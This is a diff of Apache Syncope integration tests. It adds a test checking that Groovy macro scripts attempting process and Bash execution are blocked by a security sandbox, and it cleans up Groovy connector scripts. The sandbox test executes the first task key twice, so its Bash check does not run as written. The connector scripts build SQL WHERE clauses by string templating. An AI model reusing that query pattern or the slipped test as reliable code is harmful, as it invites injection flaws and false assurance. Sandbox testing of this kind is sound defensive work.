-            if (e.getType().getResponseStatus() == Response.Status.NOT_FOUND) {
-                macroActions = new ImplementationTO();
-                macroActions.setKey(TestMacroActions.class.getSimpleName());
-                macroActions.setEngine(ImplementationEngine.JAVA);
-                macroActions.setType(IdRepoImplementationType.MACRO_ACTIONS);
-                macroActions.setBody(TestMacroActions.class.getName());
-                Response response = IMPLEMENTATION_SERVICE.create(macroActions);
-                macroActions = IMPLEMENTATION_SERVICE.read(
-                        macroActions.getType(), response.getHeaderString(RESTHeaders.RESOURCE_KEY));
-                assertNotNull(macroActions.getKey());
-            }
-        }
-        assertNotNull(macroActions);
+        createMacroActionsIfNeeded(
+                TestMacroActions.class.getSimpleName(),
+                ImplementationEngine.JAVA,
+                TestMacroActions.class.getName());
 
         if (MACRO_TASK_KEY == null) {
             MACRO_TASK_KEY = TASK_SERVICE.<MacroTaskTO>search(
@@ -174,8 +183,8 @@ public void execute() {
         parent.setValue("/odd");
 
         int preExecs = TASK_SERVICE.read(TaskType.MACRO, MACRO_TASK_KEY, true).getExecutions().size();
-        ExecTO execution = TASK_SERVICE.execute(new ExecSpecs.Builder().key(MACRO_TASK_KEY).build(), form);
-        assertNotNull(execution.getExecutor());
+        ExecTO exec = TASK_SERVICE.execute(new ExecSpecs.Builder().key(MACRO_TASK_KEY).build(), form);
+        assertNotNull(exec.getExecutor());
 
         await().atMost(MAX_WAIT_SECONDS, TimeUnit.SECONDS).pollInterval(1, TimeUnit.SECONDS).until(() -> {
             try {
@@ -185,7 +194,7 @@ public void execute() {
             }
         });
 
-        ExecTO exec = TASK_SERVICE.read(TaskType.MACRO, MACRO_TASK_KEY, true).getExecutions().get(preExecs);
+        exec = TASK_SERVICE.read(TaskType.MACRO, MACRO_TASK_KEY, true).getExecutions().get(preExecs);
         assertEquals(ExecStatus.SUCCESS.name(), exec.getStatus());
 
         AnyObjectTO printer = ANY_OBJECT_SERVICE.read(PRINTER, TCA.getPrinterName());
@@ -264,4 +273,61 @@ public void cantExecute() {
             assertEquals(ClientExceptionType.DelegatedAdministration, e.getType());
         }
     }
+
+    @Test
+    public void groovySecuritySandbox() throws IOException {
+        createMacroActionsIfNeeded(
+                "ProcessBuilderMacroActions",
+                ImplementationEngine.GROOVY,
+                IOUtils.toString(
+                        getClass().getResourceAsStream("/ProcessBuilderMacroActions.groovy"), StandardCharsets.UTF_8));
+
+        MacroTaskTO task = new MacroTaskTO();
+        task.setName("groovySecuritySandbox" + UUID.randomUUID().toString());
+        task.setActive(true);
+        task.setRealm("/odd");
+        task.setMacroActions("ProcessBuilderMacroActions");
+
+        Response response = TASK_SERVICE.create(TaskType.MACRO, task);
+        String firstTaskKey = response.getHeaderString(RESTHeaders.RESOURCE_KEY);
+        assertNotNull(firstTaskKey);
+        TASK_SERVICE.execute(new ExecSpecs.Builder().key(firstTaskKey).build());
+
+        ExecTO exec = await().atMost(MAX_WAIT_SECONDS, TimeUnit.SECONDS).pollInterval(1, TimeUnit.SECONDS).until(() -> {
+            try {
+                return TASK_SERVICE.read(TaskType.MACRO, firstTaskKey, true).getExecutions().getFirst();
+            } catch (Exception e) {
+                return null;
+            }
+        }, e -> e != null && !"JOB_FIRED".equals(e.getStatus()));
+        assertEquals(ExecStatus.FAILURE.name(), exec.getStatus());
+        assertTrue(exec.getMessage().startsWith("java.lang.SecurityException: Insecure call to"));
+
+        createMacroActionsIfNeeded(
+                "BashMacroActions",
+                ImplementationEngine.GROOVY,
+                IOUtils.toString(
+                        getClass().getResourceAsStream("/BashMacroActions.groovy"), StandardCharsets.UTF_8));
+
+        task = new MacroTaskTO();
+        task.setName("groovySecuritySandbox" + UUID.randomUUID().toString());
+        task.setActive(true);
+        task.setRealm("/odd");
+        task.setMacroActions("BashMacroActions");
+
+        response = TASK_SERVICE.create(TaskType.MACRO, task);
+        String secondTaskKey = response.getHeaderString(RESTHeaders.RESOURCE_KEY);
+        assertNotNull(secondTaskKey);
+        TASK_SERVICE.execute(new ExecSpecs.Builder().key(firstTaskKey).build());
+
+        exec = await().atMost(MAX_WAIT_SECONDS, TimeUnit.SECONDS).pollInterval(1, TimeUnit.SECONDS).until(() -> {
+            try {
+                return TASK_SERVICE.read(TaskType.MACRO, firstTaskKey, true).getExecutions().getFirst();
+            } catch (Exception e) {
+                return null;
+            }
+        }, e -> e != null && !"JOB_FIRED".equals(e.getStatus()));
+        assertEquals(ExecStatus.FAILURE.name(), exec.getStatus());
+        assertTrue(exec.getMessage().startsWith("java.lang.SecurityException: Insecure call to"));
+    }
 }

@@ -16,8 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
-
 import org.apache.syncope.core.provisioning.api.pushpull.InboundActions;
 import org.apache.syncope.common.lib.request.AnyUR;
 import org.apache.syncope.common.lib.to.EntityTO;
@@ -34,7 +32,6 @@ import org.identityconnectors.framework.common.objects.LiveSyncDelta;
 /**
  * Class for integration tests: add new resource and put a password only for it.
  */
-@CompileStatic
 class AddResourcePullActions implements InboundActions {
   
   void beforeUpdate(
@@ -66,4 +63,4 @@ class AddResourcePullActions implements InboundActions {
       userUR.getResources().add(resPatchItem);
     }
   }
-}
\ No newline at end of file
+}

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.time.OffsetDateTime
 import org.apache.syncope.common.lib.request.AnyUR
 import org.apache.syncope.common.lib.types.OpEvent
@@ -25,7 +24,6 @@ import org.apache.syncope.core.provisioning.api.AuditManager
 import org.apache.syncope.core.spring.security.AuthContextUtils
 import org.springframework.beans.factory.annotation.Autowired
 
-@CompileStatic
 class CustomAuditLogicActions implements LogicActions {
 
   @Autowired

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.Attr
 import org.apache.syncope.common.lib.request.AnyCR
 import org.apache.syncope.common.lib.request.AnyUR
@@ -26,7 +25,6 @@ import org.apache.syncope.core.logic.api.LogicActions
 /**
  * Class for integration tests: transform (by making it double) any attribute value for defined schema.
  */
-@CompileStatic
 class DoubleValueLogicActions implements LogicActions {
   
   private static final String NAME = "makeItDouble";
@@ -70,4 +68,4 @@ class DoubleValueLogicActions implements LogicActions {
 
     return input;
   }
-}
\ No newline at end of file
+}

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-
 import java.util.Map
 import org.apache.syncope.common.lib.command.CommandArgs
 import org.apache.syncope.core.logic.SyncopeLogic

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.ArrayList;
 import java.util.List;
 import org.apache.commons.lang3.StringUtils;
@@ -28,7 +27,6 @@ import org.apache.syncope.core.persistence.api.entity.Any
 import org.apache.syncope.core.persistence.api.entity.PlainAttrValue
 import org.apache.syncope.core.provisioning.api.data.ItemTransformer;
 
-@CompileStatic
 class PrefixItemTransformer implements ItemTransformer {
 	
   public static String PREFIX = "PREFIX_";

@@ -16,8 +16,7 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.sql.Sql;
-import groovy.sql.DataSet;
+import groovy.sql.Sql
 
 // Parameters:
 // The connector sends the following:
@@ -48,11 +47,11 @@ import groovy.sql.DataSet;
 // !!!! Each Map must contain a '__UID__' and '__NAME__' attribute.
 // This is required to build a ConnectorObject.
 
-log.info("Entering " + action + " Script");
+log.info("Entering " + action + " Script")
 
-def sql = new Sql(connection);
+def sql = new Sql(connection)
 def result = []
-def where = "";
+def where = ""
 
 if (query != null)  {
   // Need to handle the __UID__ in queries
@@ -61,7 +60,7 @@ if (query != null)  {
   }
   
   // We can use Groovy template engine to generate our custom SQL queries
-  def engine = new groovy.text.SimpleTemplateEngine();
+  def engine = new groovy.text.SimpleTemplateEngine()
 
   def whereTemplates = [
     CONTAINS:' WHERE $left ${not ? "NOT " : ""}LIKE "%$right%"',
@@ -74,21 +73,22 @@ if (query != null)  {
     LESSTHANOREQUAL:' WHERE $left ${not ? ">" : "<="} "$right"'
   ]
 
-  def wt = whereTemplates.get(query.get("operation"));
-  def binding = [left:query.get("left"),right:query.get("right"),not:query.get("not")];
-  def template = engine.createTemplate(wt).make(binding);
-  where = template.toString();
+  def wt = whereTemplates.get(query.get("operation"))
+  def binding = [left:query.get("left"),right:query.get("right"),not:query.get("not")]
+  def template = engine.createTemplate(wt).make(binding)
+  where = template.toString()
   log.ok("Search WHERE clause is: "+ where)
 }
 
-switch ( objectClass ) {
+switch (objectClass) {
 case "__PRINTER__":
-  sql.eachRow("SELECT * FROM TESTPRINTER " + where + ((where?.trim ()) ? "AND" : "WHERE") + " deleted <> TRUE", 
-    {result.add([__UID__:it.id, __NAME__:it.id, ID:it.id, PRINTERNAME:it.printername, LOCATION:it.location])} );
+  sql.eachRow("SELECT * FROM TESTPRINTER " + where + ((where?.trim()) ? "AND" : "WHERE") + " deleted <> TRUE") { row -> 
+    result.add([__UID__:row["id"], __NAME__:row["id"], ID:row["id"], PRINTERNAME:row["printername"], LOCATION:row["location"]])
+  }
   break
 
 default:
-  result;
+  result
 }
 
-return result;
+return result

@@ -16,8 +16,7 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.sql.Sql;
-import groovy.sql.DataSet;
+import groovy.sql.Sql
 
 // Parameters:
 // The connector sends the following:
@@ -46,54 +45,52 @@ import groovy.sql.DataSet;
 // "attributes":Map<String,List> of attributes name/values
 // ]
 
-log.info("Entering " + action + " Script");
-def sql = new Sql(connection);
+log.info("Entering " + action + " Script")
+def sql = new Sql(connection)
 
 if (action.equalsIgnoreCase("GET_LATEST_SYNC_TOKEN")) {
   switch (objectClass) {
   case "__PRINTER__":
-    row = sql.firstRow("SELECT lastmodification FROM TESTPRINTER ORDER BY lastmodification DESC");
+    row = sql.firstRow("SELECT lastmodification FROM TESTPRINTER ORDER BY lastmodification DESC")
     log.ok("Get Latest Sync Token script: last token is: " + row["lastmodification"])
-    break;
+    break
     
   default:
-    row = null;
+    row = null
   }
 
-  return row == null ? null : row["lastmodification"].getTime();
+  return row == null ? null : row["lastmodification"].getTime()
 } else if (action.equalsIgnoreCase("SYNC")) {
-  def result = [];
-  def lastmodification = null;
+  def result = []
+  def lastmodification = null
   if (token != null) {
-    lastmodification = new Date(token);
+    lastmodification = new Date(token)
   } else {
-    lastmodification = new Date(0);
+    lastmodification = new Date(0)
   }
 
   switch (objectClass) {
   case "__PRINTER__":
-    sql.eachRow("SELECT * FROM TESTPRINTER WHERE lastmodification > ${lastmodification}",
-      {
-        result.add([
-            operation:it.deleted ? "DELETE": "CREATE_OR_UPDATE", 
-            uid:it.id.toString(), 
-            token:it.lastmodification.getTime(), 
-            attributes:[
-              __UID__:it.id.toString(),
-              __NAME__:it.id.toString(),
-              ID:it.id.toString(),
-              PRINTERNAME:it.printername,
-              LOCATION:it.location
-            ]
-          ]);
-      }
-    )
-    break;
+    sql.eachRow("SELECT * FROM TESTPRINTER WHERE lastmodification > ${lastmodification}") { row ->
+      result.add([
+          operation:row["deleted"] ? "DELETE": "CREATE_OR_UPDATE", 
+          uid:row["id"].toString(), 
+          token:row["lastmodification"].getTime(), 
+          attributes:[
+            __UID__:row["id"].toString(),
+            __NAME__:row["id"].toString(),
+            ID:row["id"].toString(),
+            PRINTERNAME:row["printername"],
+            LOCATION:row["location"]
+          ]
+        ])
+    }
+    break
   }
   
-  log.ok("Sync script: found " + result.size() + " events to sync");
-  return result;
+  log.ok("Sync script: found " + result.size() + " events to sync")
+  return result
 } else {
-  log.error("Sync script: action '" + action + "' is not implemented in this script");
-  return null;
+  log.error("Sync script: action '" + action + "' is not implemented in this script")
+  return null
 }